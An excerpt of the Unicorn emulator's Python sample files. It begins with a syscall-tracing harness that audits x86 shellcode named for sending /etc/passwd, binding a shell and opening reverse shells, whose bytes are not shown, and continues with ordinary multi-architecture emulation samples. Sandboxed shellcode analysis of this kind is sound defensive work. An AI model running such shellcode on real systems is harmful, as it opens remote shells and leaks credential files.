        (ip & 0xff0000) >> 16,
        (ip & 0xff00) >> 8,
        (ip & 0xff))

def read_string(uc, addr):
    ret = ""
    c = uc.mem_read(addr, 1)[0]
    read_bytes = 1

    while c != 0x0:
        ret += chr(c)
        c = uc.mem_read(addr + read_bytes, 1)[0]
        read_bytes += 1

    return ret

def parse_sock_address(sock_addr):
    sin_family, = struct.unpack("<h", sock_addr[:2])

    if sin_family == 2:  # AF_INET
        port, host = struct.unpack(">HI", sock_addr[2:8])
        return "%s:%d" % (bin_to_ipv4(host), port)
    elif sin_family == 10:  # AF_INET6 (10 on Linux, per ADDR_FAMILY above)
        return ""

def print_sockcall(msg):
    print(">>> SOCKCALL %s" % msg)
# end utilities

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))

    # read this instruction code from memory
    tmp = uc.mem_read(address, size)
    print(">>> Instruction code at [0x%x] =" % (address), end="")
    for i in tmp:
        print(" %x" % i, end="")
    print("")

# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
    global id_gen

    # only handle Linux syscall
    if intno != 0x80:
        return

    eax = uc.reg_read(UC_X86_REG_EAX)
    ebx = uc.reg_read(UC_X86_REG_EBX)
    ecx = uc.reg_read(UC_X86_REG_ECX)
    edx = uc.reg_read(UC_X86_REG_EDX)
    eip = uc.reg_read(UC_X86_REG_EIP)

    # print(">>> INTERRUPT %d" % eax)

    if eax == 1:  # sys_exit
        print(">>> SYS_EXIT")
        uc.emu_stop()
    elif eax == 3:  # sys_read
        fd = ebx
        buf = ecx
        count = edx

        dummy_content = str(uuid.uuid1()).encode("latin1")[:32]
        if len(dummy_content) > count:
            dummy_content = dummy_content[:count]

        uc.mem_write(buf, dummy_content)

        msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content)

        fd_chains.add_log(fd, msg)
        print(">>> %s" % msg)
    elif eax == 4:  # sys_write
        fd = ebx
        buf = ecx
        count = edx

        content = uc.mem_read(buf, count)

        msg = "write data=%s count=%d to fd(%d)" % (content, count, fd)

        print(">>> %s" % msg)
        fd_chains.add_log(fd, msg)
    elif eax == 5:  # sys_open
        filename_addr = ebx
        flags = ecx
        mode = edx
        filename = read_string(uc, filename_addr)

        dummy_fd = id_gen.next()
        uc.reg_write(UC_X86_REG_EAX, dummy_fd)

        msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd)

        fd_chains.create_chain(dummy_fd)
        fd_chains.add_log(dummy_fd, msg)
        print(">>> %s" % msg)
    elif eax == 11:  # sys_execve
        # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx))
        filename = read_string(uc, ebx)

        print(">>> SYS_EXECVE filename=%s" % filename)
    elif eax == 63:  # sys_dup2
        fd_chains.link_fd(ecx, ebx)
        print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx))
    elif eax == 102:  # sys_socketcall
        # ref: http://www.skyfree.org/linux/kernel_network/socket.html
        call = uc.reg_read(UC_X86_REG_EBX)
        args = uc.reg_read(UC_X86_REG_ECX)

        SOCKETCALL_NUM_ARGS = {
            1: 3,   # sys_socket
            2: 3,   # sys_bind
            3: 3,   # sys_connect
            4: 2,   # sys_listen
            5: 3,   # sys_accept
            9: 4,   # sys_send
            11: 4,  # sys_receive
            13: 2   # sys_shutdown
        }

        buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG)
        args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf)

        # int sys_socketcall(int call, unsigned long *args)
        if call == 1:  # sys_socket
            # err = sys_socket(a0, a1, a[2])
            # int sys_socket(int family, int type, int protocol)
            family = args[0]
            sock_type = args[1]
            protocol = args[2]

            dummy_fd = id_gen.next()
            uc.reg_write(UC_X86_REG_EAX, dummy_fd)

            if family == 2:  # AF_INET
                msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd)
                fd_chains.create_chain(dummy_fd)
                fd_chains.add_log(dummy_fd, msg)
                print_sockcall(msg)
            elif family == 10:  # AF_INET6 (10 on Linux, per ADDR_FAMILY above)
                pass
        elif call == 2:  # sys_bind
            fd = args[0]
            umyaddr = args[1]
            addrlen = args[2]

            sock_addr = uc.mem_read(umyaddr, addrlen)

            msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr))

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)
        elif call == 3:  # sys_connect
            # err = sys_connect(a0, (struct sockaddr *)a1, a[2])
            # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen)
            fd = args[0]
            uservaddr = args[1]
            addrlen = args[2]

            sock_addr = uc.mem_read(uservaddr, addrlen)
            msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr))

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)
        elif call == 4:  # sys_listen
            fd = args[0]
            backlog = args[1]

            msg = "fd(%d) listened with backlog=%d" % (fd, backlog)

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)
        elif call == 5:  # sys_accept
            fd = args[0]
            upeer_sockaddr = args[1]
            upeer_addrlen = args[2]

            # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen))

            if upeer_sockaddr == 0x0:
                print_sockcall("fd(%d) accept client" % fd)
            else:
                upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4))

                sock_addr = uc.mem_read(upeer_sockaddr, upeer_len)

                msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr))

                fd_chains.add_log(fd, msg)
                print_sockcall(msg)
        elif call == 9:  # sys_send
            fd = args[0]
            buff = args[1]
            length = args[2]
            flags = args[3]

            buf = uc.mem_read(buff, length)

            msg = "fd(%d) send data=%s" % (fd, buf)

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)
        elif call == 11:  # sys_receive
            fd = args[0]
            ubuf = args[1]
            size = args[2]
            flags = args[3]

            msg = "fd(%d) is about to receive data with size=%d flags=%d" % (fd, size, flags)

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)
        elif call == 13:  # sys_shutdown
            fd = args[0]
            how = args[1]

            msg = "fd(%d) is shut down (how=%d)" % (fd, how)

            fd_chains.add_log(fd, msg)
            print_sockcall(msg)

# Test X86 32 bit
def test_i386(code):
    global fd_chains

    fd_chains.clean()
    print("Emulate i386 code")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, code)

        # initialize stack
        mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)

        # tracing all instructions with customized callback
        # mu.hook_add(UC_HOOK_CODE, hook_code)

        # handle interrupt ourself
        mu.hook_add(UC_HOOK_INTR, hook_intr)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(code))

        # now print out some registers
        print(">>> Emulation done")

    except UcError as e:
        print("ERROR: %s" % e)

    fd_chains.print_report()

# Globals
fd_chains = LogChain()
id_gen = IdGenerator()

if __name__ == '__main__':
    test_i386(X86_SEND_ETCPASSWD)
    test_i386(X86_BIND_TCP)
    test_i386(X86_REVERSE_TCP)
    test_i386(X86_REVERSE_TCP_2)
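# Editor's self-check sketch for the address helpers above: an AF_INET
# sockaddr is family (little-endian short), port (big-endian), IPv4 address.
assert parse_sock_address(struct.pack("<h", 2) + struct.pack(">HI", 8080, 0x7f000001)) == "127.0.0.1:8080"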
unicorn-2.1.1/bindings/python/sample_ppc.py

#!/usr/bin/env python
# Sample code for PPC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
#

from __future__ import print_function
from unicorn import *
from unicorn.ppc_const import *

# code to be emulated
PPC_CODE = b"\x7F\x46\x1A\x14"  # add r26, r6, r3

# memory address where emulation starts
ADDRESS = 0x10000

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))

# Test PPC
def test_ppc():
    print("Emulate PPC code")
    try:
        # Initialize emulator in PPC EB mode
        mu = Uc(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, PPC_CODE)

        # initialize machine registers
        mu.reg_write(UC_PPC_REG_3, 0x1234)
        mu.reg_write(UC_PPC_REG_6, 0x6789)
        mu.reg_write(UC_PPC_REG_26, 0x5555)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(PPC_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r26 = mu.reg_read(UC_PPC_REG_26)
        print(">>> r26 = 0x%x" % r26)

    except UcError as e:
        print("ERROR: %s" % e)

if __name__ == '__main__':
    test_ppc()
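# Editor's note: with the inputs above, `add r26, r6, r3` should leave
# r26 = 0x6789 + 0x1234 = 0x79bd; the 0x5555 preset is overwritten.
assert 0x6789 + 0x1234 == 0x79bd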
unicorn-2.1.1/bindings/python/sample_riscv.py

#!/usr/bin/env python
# Sample code for RISCV of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
#

from __future__ import print_function
from unicorn import *
from unicorn.riscv_const import *

'''
$ cstool riscv64 1305100093850502
 0  13 05 10 00  addi   a0, zero, 1
 4  93 85 05 02  addi   a1, a1, 0x20
'''
RISCV_CODE = b"\x13\x05\x10\x00\x93\x85\x05\x02"

# memory address where emulation starts
ADDRESS = 0x10000

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))

# Test RISCV
def test_riscv():
    print("Emulate RISCV code")
    try:
        # Initialize emulator in RISCV32 mode
        mu = Uc(UC_ARCH_RISCV, UC_MODE_RISCV32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, RISCV_CODE)

        # initialize machine registers
        mu.reg_write(UC_RISCV_REG_A0, 0x1234)
        mu.reg_write(UC_RISCV_REG_A1, 0x7890)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(RISCV_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        a0 = mu.reg_read(UC_RISCV_REG_A0)
        a1 = mu.reg_read(UC_RISCV_REG_A1)
        print(">>> A0 = 0x%x" %a0)
        print(">>> A1 = 0x%x" %a1)

    except UcError as e:
        print("ERROR: %s" % e)

if __name__ == '__main__':
    test_riscv()
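# Editor's note: per the cstool disassembly above, the expected final state is
# a0 = 1 (addi a0, zero, 1) and a1 = 0x7890 + 0x20 = 0x78b0 (addi a1, a1, 0x20).
assert 0x7890 + 0x20 == 0x78b0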
Below is the CPU context") r2 = mu.reg_read(UC_S390X_REG_R2) r3 = mu.reg_read(UC_S390X_REG_R3) print(">>> R2 = 0x%x" % r2) print(">>> R3 = 0x%x" % r3) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_s390x() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_sparc.py�������������������������������������������������������0000775�0000000�0000000�00000003531�14675241067�0021352�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for SPARC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> # Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> from __future__ import print_function from unicorn import * from unicorn.sparc_const import * # code to be emulated SPARC_CODE = b"\x86\x00\x40\x02" # add %g1, %g2, %g3; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test SPARC def test_sparc(): print("Emulate SPARC code") try: # Initialize emulator in SPARC EB mode mu = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, SPARC_CODE) # initialize machine registers mu.reg_write(UC_SPARC_REG_G1, 0x1230) mu.reg_write(UC_SPARC_REG_G2, 0x6789) mu.reg_write(UC_SPARC_REG_G3, 0x5555) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(SPARC_CODE)) # now print out some registers print(">>> Emulation done. 
Below is the CPU context") g3 = mu.reg_read(UC_SPARC_REG_G3) print(">>> G3 = 0x%x" %g3) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_sparc() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_tricore.py�����������������������������������������������������0000775�0000000�0000000�00000003256�14675241067�0021715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python ''' Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv ''' from __future__ import print_function from unicorn import * from unicorn.tricore_const import * # code to be emulated TRICORE_CODE = b"\x82\x11\xbb\x00\x00\x08" # mov d0, #0x1; mov.u d0, #0x8000 # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks def hook_block(uc, address, size, user_data): print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) # callback for tracing instructions def hook_code(uc, address, size, user_data): print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) # Test TriCore def test_tricore(): print("Emulate TriCore code") try: # Initialize emulator in TriCore mode mu = Uc(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, TRICORE_CODE) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing one instruction at ADDRESS with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(TRICORE_CODE)) # now print out some registers print(">>> Emulation done. Below is the CPU context") r0 = mu.reg_read(UC_TRICORE_REG_D0) print(">>> D0 = 0x%x" %r0) except UcError as e: print("ERROR: %s" % e) if __name__ == '__main__': test_tricore() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/sample_x86.py���������������������������������������������������������0000775�0000000�0000000�00000055335�14675241067�0020700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # Sample code for X86 of Unicorn. 
unicorn-2.1.1/bindings/python/sample_x86.py

#!/usr/bin/env python
# Sample code for X86 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>

from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *
import pickle

X86_CODE32 = b"\x41\x4a\x66\x0f\xef\xc1"  # INC ecx; DEC edx; PXOR xmm0, xmm1
X86_CODE32_LOOP = b"\x41\x4a\xeb\xfe"  # INC ecx; DEC edx; JMP self-loop
X86_CODE32_JUMP = b"\xeb\x02\x90\x90\x90\x90\x90\x90"  # jmp 4; nop; nop; nop; nop; nop; nop
X86_CODE32_JMP_INVALID = b"\xe9\xe9\xee\xee\xee\x41\x4a"  # JMP outside; INC ecx; DEC edx
X86_CODE32_MEM_READ = b"\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a"  # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx
X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a"  # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx
X86_CODE64 = b"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59"
X86_CODE32_INOUT = b"\x41\xE4\x3F\x4a\xE6\x46\x43"  # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx
X86_CODE64_SYSCALL = b'\x0f\x05'  # SYSCALL
X86_CODE16 = b'\x00\x00'  # add byte ptr [bx + si], al
X86_MMIO_CODE = b"\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00"  # mov [0x20004], ecx; mov ecx, [0x20004]

# memory address where emulation starts
ADDRESS = 0x1000000

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))

# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))
    eflags = uc.reg_read(UC_X86_REG_EFLAGS)
    print(">>> --- EFLAGS is 0x%x" %eflags)

def hook_code64(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size))
    rip = uc.reg_read(UC_X86_REG_RIP)
    print(">>> RIP is 0x%x" %rip)

# callback for tracing invalid memory access (READ or WRITE)
def hook_mem_invalid(uc, access, address, size, value, user_data):
    if access == UC_MEM_WRITE_UNMAPPED:
        print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \
                %(address, size, value))
        # map this memory in with 2MB in size
        uc.mem_map(0xaaaa0000, 2 * 1024 * 1024)
        # return True to indicate we want to continue emulation
        return True
    else:
        # return False to indicate we want to stop emulation
        return False

# callback for tracing memory access (READ or WRITE)
def hook_mem_access(uc, access, address, size, value, user_data):
    if access == UC_MEM_WRITE:
        print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \
                %(address, size, value))
    else:   # READ
        print(">>> Memory is being READ at 0x%x, data size = %u" \
                %(address, size))

# callback for IN instruction
def hook_in(uc, port, size, user_data):
    eip = uc.reg_read(UC_X86_REG_EIP)
    print("--- reading from port 0x%x, size: %u, address: 0x%x" %(port, size, eip))
    if size == 1:
        # read 1 byte to AL
        return 0xf1
    if size == 2:
        # read 2 bytes to AX
        return 0xf2
    if size == 4:
        # read 4 bytes to EAX
        return 0xf4
    # we should never reach here
    return 0

# callback for OUT instruction
def hook_out(uc, port, size, value, user_data):
    eip = uc.reg_read(UC_X86_REG_EIP)
    print("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" %(port, size, value, eip))

    # confirm that value is indeed the value of AL/AX/EAX
    v = 0
    if size == 1:
        # read 1 byte from AL
        v = uc.reg_read(UC_X86_REG_AL)
    if size == 2:
        # read 2 bytes from AX
        v = uc.reg_read(UC_X86_REG_AX)
    if size == 4:
        # read 4 bytes from EAX
        v = uc.reg_read(UC_X86_REG_EAX)
    print("--- register value = 0x%x" %v)
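# Hedged sketch (editor's addition): hook callbacks receive whatever object is
# passed as user_data to hook_add, so per-run state needs no globals. The
# `hook_count` name and the dict layout are hypothetical.
def hook_count(uc, address, size, count):
    count["instructions"] += 1
# usage: mu.hook_add(UC_HOOK_CODE, hook_count, user_data={"instructions": 0})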
# Test X86 32 bit
def test_i386():
    print("Emulate i386 code")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE32)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_ECX, 0x1234)
        mu.reg_write(UC_X86_REG_EDX, 0x7890)
        mu.reg_write(UC_X86_REG_XMM0, 0x000102030405060708090a0b0c0d0e0f)
        mu.reg_write(UC_X86_REG_XMM1, 0x00102030405060708090a0b0c0d0e0f0)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r_ecx = mu.reg_read(UC_X86_REG_ECX)
        r_edx = mu.reg_read(UC_X86_REG_EDX)
        r_xmm0 = mu.reg_read(UC_X86_REG_XMM0)
        print(">>> ECX = 0x%x" %r_ecx)
        print(">>> EDX = 0x%x" %r_edx)
        print(">>> XMM0 = 0x%.32x" %r_xmm0)

        # read from memory
        tmp = mu.mem_read(ADDRESS, 4)
        print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="")
        for i in reversed(tmp):
            print("%x" %(i), end="")
        print("")

    except UcError as e:
        print("ERROR: %s" % e)

def test_i386_map_ptr():
    print("Emulate i386 code - use uc_mem_map_ptr()")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE32)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_ECX, 0x1234)
        mu.reg_write(UC_X86_REG_EDX, 0x7890)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32), 2 * UC_SECOND_SCALE)

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r_ecx = mu.reg_read(UC_X86_REG_ECX)
        r_edx = mu.reg_read(UC_X86_REG_EDX)
        print(">>> ECX = 0x%x" %r_ecx)
        print(">>> EDX = 0x%x" %r_edx)

        # read from memory
        tmp = mu.mem_read(ADDRESS, 4)
        print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="")
        for i in reversed(tmp):
            print("%x" %(i), end="")
        print("")

    except UcError as e:
        print("ERROR: %s" % e)

def test_i386_invalid_mem_read():
    print("Emulate i386 code that read from invalid memory")
    try:
        # Initialize emulator in X86-32bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_32)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, X86_CODE32_MEM_READ)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_ECX, 0x1234)
        mu.reg_write(UC_X86_REG_EDX, 0x7890)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        try:
            # emulate machine code in infinite time
            mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_READ))
        except UcError as e:
            print("Failed on uc_emu_start() with error returned 6: %s" % e)

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r_ecx = mu.reg_read(UC_X86_REG_ECX)
        r_edx = mu.reg_read(UC_X86_REG_EDX)
        print(">>> ECX = 0x%x" %r_ecx)
        print(">>> EDX = 0x%x" %r_edx)

    except UcError as e:
        print("ERROR: %s" % e)
Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR: %s" % e) def test_i386_jump(): print("Emulate i386 code with jump") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_JUMP) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block, begin=ADDRESS, end=ADDRESS) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JUMP)) except UcError as e: print("ERROR: %s" % e) print(">>> Emulation done. Below is the CPU context") except UcError as e: print("ERROR: %s" % e) def test_i386_invalid_mem_write(): print("Emulate i386 code that write to invalid memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) # intercept invalid memory events mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) try: # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) except UcError as e: print("ERROR: %s" % e) # now print out some registers print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) # read from memory print(">>> Read 4 bytes from [0x%x] = 0x" %(0xaaaaaaaa), end="") tmp = mu.mem_read(0xaaaaaaaa, 4) for i in reversed(tmp): if i != 0: print("%x" %i, end="") print("") try: tmp = mu.mem_read(0xffffffaa, 4) print(">>> Read 4 bytes from [0x%x] = 0x" %(0xffffffaa), end="") for i in reversed(tmp): print("%x" %i, end="") print("") except UcError as e: print(">>> Failed to read 4 bytes from [0xffffffaa]") except UcError as e: print("ERROR: %s" % e) def test_i386_jump_invalid(): print("Emulate i386 code that jumps to invalid memory") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_JMP_INVALID) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, hook_code) try: mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JMP_INVALID)) except UcError as e: print("Failed on uc_emu_start() with error returned 8: %s" %e) print(">>> Emulation done. 
Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR %s" % e) def test_i386_loop(): print("Emulate i386 code that loop forever") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_LOOP) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_LOOP), timeout=2*UC_SECOND_SCALE) print(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) print(">>> ECX = 0x%x" %r_ecx) print(">>> EDX = 0x%x" %r_edx) except UcError as e: print("ERROR: %s" % e) # Test X86 32 bit with IN/OUT instruction def test_i386_inout(): print("Emulate i386 code with IN/OUT instructions") try: # Initialize emulator in X86-32bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32) # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_INOUT) # initialize machine registers mu.reg_write(UC_X86_REG_EAX, 0x1234) mu.reg_write(UC_X86_REG_ECX, 